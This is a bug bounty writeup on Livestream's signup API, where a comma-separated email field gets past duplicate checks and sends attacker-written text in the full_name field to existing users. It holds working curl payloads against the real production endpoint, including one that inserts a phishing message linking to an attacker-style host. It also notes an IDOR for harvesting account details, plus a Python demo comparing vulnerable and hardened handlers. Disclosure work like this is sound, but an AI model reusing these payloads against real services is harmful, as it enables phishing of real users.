Vimeo Livestream Bug Bounty WriteUp

Mohamed Slamat
Jan 29 · 3 min read

Phishing Using Signup at Livestream API

Hi guys, today I will share with you a writeup about this vulnerability.

So to sign up on Livestream, we need to send email, full_name and password to the API endpoint https://api.livestream.com/accounts

Payload :

curl -i -X POST https://api.new.livestream.com/accounts -d 'email=x123580@yopmail.com&password=12345678950&full_name=meisyou'

API Response :

{"id":29106223,"full_name":"meisyou","short_name":null,"picture":null,"is_beta_producer":true,"timezone":"Africa/Algiers","description":null,"background_image":null,"background_color":null,"background_repeat":null,"background_position":null,"background_attachment":null,"created_at":"2020-01-24T10:04:59.580Z","is_locked":false,"upcoming_events":null,"past_events":null,"links":null,"google_analytics_id":null,"mixpanel_id":"577f53fc-61ea-46a7-b21c-aba016bb85bc","signup_page":null,"signup_action":null,"devices":{"total":0,"data":[]},"category":null,"category_name":null,"private":false,"features":null,"plan_id":-1,"plan_info":{"id":-1,"features":"0","type":10,"is_scoped":false},"features_with_plan":null,"is_searchable":true,"is_public":true,"ad_account_id":null,"ad_provider_id":null,"ad_custom_params":{"accountId":"%accountId%","eventId":"%eventId%","live":"%isLive%","embedPath":"%embedPath%","embedHost":"%embedHost%"},"ad_enabled_for_vod":false,"ad_enabled_for_live":false,"ad_rules_enabled":false,"ad_midroll_duration":40,"ad_enabled_for_owner":true,"ad_types":["preroll"],"ad_enabled":false,"privacy_freeze":false,"followers":null,"following":null}

And a mail containing the activation URL will be sent to this address: x123580@yopmail.com

As you can see, the message starts with "Hi <full_name> ....."

But if we send the same payload again for the same user:

API Response :

{"name":"DuplicateEntryError","message":"email already exists.","field":"email"}

Since the user already exists, we can't register him again and he will receive nothing, right?

So after guessing at the backend code, I think it is written this way:

Pseudo code :

db = set()                                   # registered emails (inferred)

def signup(email, password, full_name):
    if email in db:                          # exact string match, no email-format check
        return "email already exists"
    db.add(email)                            # register()
    mail(email, "Hi " + full_name + " ...")  # activation mail; full_name is echoed into the body

I noticed that the email is not validated for email format: I mean you can send whatever you want as the email, some "blabla", and the account will be opened!

To log in with this account, you just need to inspect the element and change the type of the email input from email to text!

So our "blabla" will be stored in the database too!

Hmmmmmm !!!

Okay, let's meet the mail() function in PHP.

How does it work?

mail($email, $subject, $message, $headers);  // PHP signature: mail($to, $subject, $message, $additional_headers)

Let's talk about the $email variable:

The mail() function can send to one or more addresses: the $email variable may contain several addresses separated by a COMMA ",".

So if $email = "email1@dom.com,email2@dom.com"; a mail will be sent to both addresses with the same subject and message 😮

And since we control the full_name in our payload ...

And we can get past the "if email in db" check because:

"blabla@bll.dz,x123580@yopmail.com" != "x123580@yopmail.com"
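As an added example (not code from the original post and not Livestream's code), here is a toy Python version of the signup flow inferred above, beside a hardened version of the same handler. The php_style_mail function only imitates the comma-separated recipient behaviour of PHP's mail() described above; the in-memory account table, the outbox, the activation link and the specific validation rules in register_hardened are assumptions made for this demo.

```python
import re

# Constructed stand-ins for the real database and mail transport so the example runs offline.
ACTIVATION_LINK = "https://example.invalid/activate"  # placeholder, not a real URL


def php_style_mail(outbox, to, subject, message):
    """Imitates PHP mail(): a comma-separated $to string delivers the same message
    to every address in the list. Returns the number of recipients."""
    recipients = [addr.strip() for addr in to.split(",") if addr.strip()]
    for addr in recipients:
        outbox.append({"to": addr, "subject": subject, "message": message})
    return len(recipients)


def register_vulnerable(db, outbox, email, password, full_name):
    """The flow the writeup infers: exact-string duplicate check, no address
    validation, and the caller-controlled full_name echoed into the mail body.
    Password handling is out of scope and omitted."""
    if email in db:
        return {"name": "DuplicateEntryError", "message": "email already exists.", "field": "email"}
    db[email] = {"full_name": full_name}
    sent = php_style_mail(outbox, email, "Activate your account",
                          f"Hi {full_name}, activate your account: {ACTIVATION_LINK}")
    return {"email": email, "full_name": full_name, "mails_sent": sent}


# Assumed hardening rules: exactly one syntactically valid mailbox (so no comma or
# semicolon lists, no whitespace, no newlines) and a display name that cannot carry
# a URL, angle brackets or header syntax.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")
NAME_RE = re.compile(r"^[A-Za-z0-9 .'-]{1,60}$")


def register_hardened(db, outbox, email, password, full_name):
    """Same flow with the defects closed: the address is normalised and must match
    EMAIL_RE before the duplicate check, and the mail goes to that single validated
    address only, never to the raw request value."""
    email = email.strip().lower()
    if not EMAIL_RE.fullmatch(email):
        return {"name": "ValidationError", "message": "invalid email address.", "field": "email"}
    if email in db:
        return {"name": "DuplicateEntryError", "message": "email already exists.", "field": "email"}
    if not NAME_RE.fullmatch(full_name):
        return {"name": "ValidationError", "message": "invalid full_name.", "field": "full_name"}
    db[email] = {"full_name": full_name}
    php_style_mail(outbox, email, "Activate your account",
                   f"Hi {full_name}, activate your account: {ACTIVATION_LINK}")
    return {"email": email, "full_name": full_name, "mails_sent": 1}


def demo():
    """Replays the writeup's comma-list payload against both handlers and returns
    the two outboxes: the vulnerable one delivers to the existing user, the hardened
    one sends nothing."""
    existing = "x123580@yopmail.com"  # the writeup's own test address
    payload = {"email": "blabla," + existing, "password": "12345678950",
               "full_name": "Please review your account at https://example.invalid/reset"}
    db_v, out_v = {existing: {}}, []
    register_vulnerable(db_v, out_v, **payload)
    db_h, out_h = {existing: {}}, []
    register_hardened(db_h, out_h, **payload)
    return out_v, out_h


if __name__ == "__main__":
    vulnerable_outbox, hardened_outbox = demo()
    print("vulnerable handler delivered to:", [m["to"] for m in vulnerable_outbox])
    print("hardened handler delivered to:", [m["to"] for m in hardened_outbox])
```

The important detail is the order of checks in register_hardened: validation and normalisation run before the duplicate lookup, so the comparison is made on a canonical single address and the "not equal, therefore new user" shortcut no longer exists. Restricting full_name is a second, independent layer; even a template that does not greet the user by name would be safer still.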

Let’s Phish 😊 ✌️ :

curl -i -X POST https://api.new.livestream.com/accounts -d 'email=blabla,x123580@yopmail.com&password=12345678950&full_name=We noticed that your account is Hacked by someone , Please confirm and reset your account here https://hackersite.letsphish.com'

A mail was sent to an existing user (x123580@yopmail.com) using the Livestream API.

PS: I'm not sure that the API uses the mail() function, or even that it is coded in PHP, but it worked xD ✌️

Impact :

Since there is a small IDOR in the API,

i.e.: https://api.new.livestream.com/accounts/0000007

an attacker can get users' info from accounts/{id} and, using some OSINT, obtain Livestream users' emails.

An attacker can then send unlimited phishing mails to Livestream users!

Livestream Response :

i) This is not a security bug! => Report closed!

ii) Me: Ah really, are you sure? Livestream: Wait ... This is a security bug => Report opened => Report triaged

iii) Livestream sent a bounty (not full)

iv) Livestream closed the report as a #Duplicate of another report based on XSS (I can't talk about it for program confidentiality), which has no relation to phishing and bypassing the signup mail function xD ...

I hope you enjoyed it. Happy hunting!
